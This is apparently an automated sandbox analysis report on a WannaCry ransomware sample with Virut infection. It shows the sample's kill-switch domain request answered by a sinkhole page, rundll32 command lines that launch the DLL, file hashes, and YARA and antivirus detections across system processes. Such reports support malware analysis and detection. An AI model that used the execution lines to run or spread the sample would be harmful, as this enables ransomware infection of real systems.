                                                                                                                                              Jul 23, 2022 01:44:23.851027012 CEST1010INHTTP/1.1 200 OK
                                                                                                                                              Date: Fri, 22 Jul 2022 23:44:23 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 607
                                                                                                                                              Connection: close
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 72f00b44eb909134-FRA
                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 66 6c 61 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 69 67 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 68 31 3e 53 69 6e 6b 68 6f 6c 65 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 2e 63 6f 6d 22 3e 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                              1192.168.2.349772104.17.244.8180C:\Windows\mssecsvc.exe
                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                              Jul 23, 2022 01:46:05.567797899 CEST7271OUTGET / HTTP/1.1
                                                                                                                                              Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Jul 23, 2022 01:46:05.601896048 CEST7272INHTTP/1.1 200 OK
                                                                                                                                              Date: Fri, 22 Jul 2022 23:46:05 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 607
                                                                                                                                              Connection: close
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 72f00dc0dd689165-FRA
                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 66 6c 61 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 69 67 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 68 31 3e 53 69 6e 6b 68 6f 6c 65 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 2e 63 6f 6d 22 3e 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>


                                                                                                                                              Statistics

                                                                                                                                              CPU Usage

                                                                                                                                              Click to jump to process

                                                                                                                                              Memory Usage

                                                                                                                                              Click to jump to process

                                                                                                                                              Behavior

                                                                                                                                              Click to jump to process

                                                                                                                                              System Behavior

                                                                                                                                              General

                                                                                                                                              Target ID:0
                                                                                                                                              Start time:01:44:14
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\loaddll32.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:loaddll32.exe "C:\Users\user\Desktop\y2jb4FtSNq.dll"
                                                                                                                                              Imagebase:0xf40000
                                                                                                                                              File size:116736 bytes
                                                                                                                                              MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Target ID:1
                                                                                                                                              Start time:01:44:15
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\y2jb4FtSNq.dll",#1
                                                                                                                                              Imagebase:0xc20000
                                                                                                                                              File size:232960 bytes
                                                                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Target ID:2
                                                                                                                                              Start time:01:44:15
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:rundll32.exe C:\Users\user\Desktop\y2jb4FtSNq.dll,PlayGame
                                                                                                                                              Imagebase:0x220000
                                                                                                                                              File size:61952 bytes
                                                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Target ID:3
                                                                                                                                              Start time:01:44:15
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:rundll32.exe "C:\Users\user\Desktop\y2jb4FtSNq.dll",#1
                                                                                                                                              Imagebase:0x220000
                                                                                                                                              File size:61952 bytes
                                                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Target ID:4
                                                                                                                                              Start time:01:44:17
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\mssecsvc.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\WINDOWS\mssecsvc.exe
                                                                                                                                              Imagebase:0x400000
                                                                                                                                              File size:3751936 bytes
                                                                                                                                              MD5 hash:B0F06045E4D3E693094C54C315A5B632
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000004.00000000.263313016.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000004.00000000.264700053.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000004.00000000.260276885.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000004.00000002.499145703.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000004.00000002.501302167.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000004.00000000.263399045.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                                                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000004.00000000.261708466.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000004.00000000.261795649.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000004.00000000.260345828.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                                                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000004.00000002.499291701.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                                                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000004.00000000.264801473.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                                                                                                              • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Windows\mssecsvc.exe, Author: Florian Roth (with the help of binar.ly)
                                                                                                                                              • Rule: WannaCry_Ransomware_Gen, Description: Detects WannaCry Ransomware, Source: C:\Windows\mssecsvc.exe, Author: Florian Roth (based on rule by US CERT)
                                                                                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Windows\mssecsvc.exe, Author: Joe Security
                                                                                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Windows\mssecsvc.exe, Author: us-cert code analysis team
                                                                                                                                              • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Windows\mssecsvc.exe, Author: ReversingLabs
                                                                                                                                              Antivirus matches:
                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                              • Detection: 82%, Metadefender, Browse
                                                                                                                                              • Detection: 97%, ReversingLabs
                                                                                                                                              Reputation:low

                                                                                                                                              General

                                                                                                                                              Target ID:7
                                                                                                                                              Start time:01:44:19
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:rundll32.exe "C:\Users\user\Desktop\y2jb4FtSNq.dll",PlayGame
                                                                                                                                              Imagebase:0x220000
                                                                                                                                              File size:61952 bytes
                                                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Target ID:8
                                                                                                                                              Start time:01:44:19
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\mssecsvc.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\WINDOWS\mssecsvc.exe
                                                                                                                                              Imagebase:0x400000
                                                                                                                                              File size:3751936 bytes
                                                                                                                                              MD5 hash:B0F06045E4D3E693094C54C315A5B632
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000008.00000000.265661394.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000008.00000000.265918603.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                                                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000008.00000002.348414559.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000008.00000000.272553493.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                                                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000008.00000000.269555839.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000008.00000000.272462934.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000008.00000002.348690021.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                                                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000008.00000000.268279528.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000008.00000000.268327554.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                                                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000008.00000000.269636175.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                                                                                                              Reputation:low

                                                                                                                                              General

                                                                                                                                              Target ID:9
                                                                                                                                              Start time:01:44:20
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\winlogon.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:winlogon.exe
                                                                                                                                              Imagebase:0x7ff75dae0000
                                                                                                                                              File size:677376 bytes
                                                                                                                                              MD5 hash:F9017F2DC455AD373DF036F5817A8870
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000009.00000002.780672620.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000009.00000002.780866805.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000009.00000000.267576574.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000009.00000000.277208197.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000009.00000000.277226697.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              Reputation:moderate

                                                                                                                                              General

                                                                                                                                              Target ID:11
                                                                                                                                              Start time:01:44:22
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\lsass.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\lsass.exe
                                                                                                                                              Imagebase:0x7ff6988c0000
                                                                                                                                              File size:57976 bytes
                                                                                                                                              MD5 hash:317340CD278A374BCEF6A30194557227
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000B.00000002.780673588.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000B.00000000.280498648.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000B.00000000.280480248.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000B.00000000.270705788.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000B.00000002.780822573.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              Reputation:moderate

                                                                                                                                              General

                                                                                                                                              Target ID:12
                                                                                                                                              Start time:01:44:24
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\mssecsvc.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\WINDOWS\mssecsvc.exe -m security
                                                                                                                                              Imagebase:0x400000
                                                                                                                                              File size:3751936 bytes
                                                                                                                                              MD5 hash:B0F06045E4D3E693094C54C315A5B632
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 0000000C.00000002.350893467.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000C.00000002.353602442.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 0000000C.00000000.275826042.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000C.00000002.353517886.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 0000000C.00000000.275761350.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 0000000C.00000002.351059064.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                                                                                                              Reputation:low

                                                                                                                                              General

                                                                                                                                              Target ID:13
                                                                                                                                              Start time:01:44:24
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\fontdrvhost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:fontdrvhost.exe
                                                                                                                                              Imagebase:0x7ff7d9820000
                                                                                                                                              File size:790304 bytes
                                                                                                                                              MD5 hash:31113981180E69C2773BCADA4051738A
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000D.00000002.780855018.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000D.00000000.276526183.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000D.00000002.780673231.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000D.00000000.282602589.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000D.00000000.282588543.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              Reputation:moderate

                                                                                                                                              General

                                                                                                                                              Target ID:14
                                                                                                                                              Start time:01:44:25
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:c:\windows\system32\svchost.exe -k dcomlaunch -p -s PlugPlay
                                                                                                                                              Imagebase:0x7ff73c930000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000E.00000000.283723923.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000E.00000000.279124721.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000E.00000000.283773556.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000E.00000002.780673489.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000E.00000002.780892179.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                                                                                                                                              General

                                                                                                                                              Target ID:15
                                                                                                                                              Start time:01:44:26
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p
                                                                                                                                              Imagebase:0x7ff73c930000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000F.00000002.780898779.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000F.00000000.286148744.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000F.00000000.286120920.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000F.00000002.780705476.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000F.00000000.280846921.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                                                                                                                                              General

                                                                                                                                              Target ID:16
                                                                                                                                              Start time:01:44:32
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                                              Imagebase:0x7ff73c930000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              General

                                                                                                                                              Target ID:17
                                                                                                                                              Start time:01:44:32
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:c:\windows\system32\svchost.exe -k rpcss -p
                                                                                                                                              Imagebase:0x7ff73c930000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
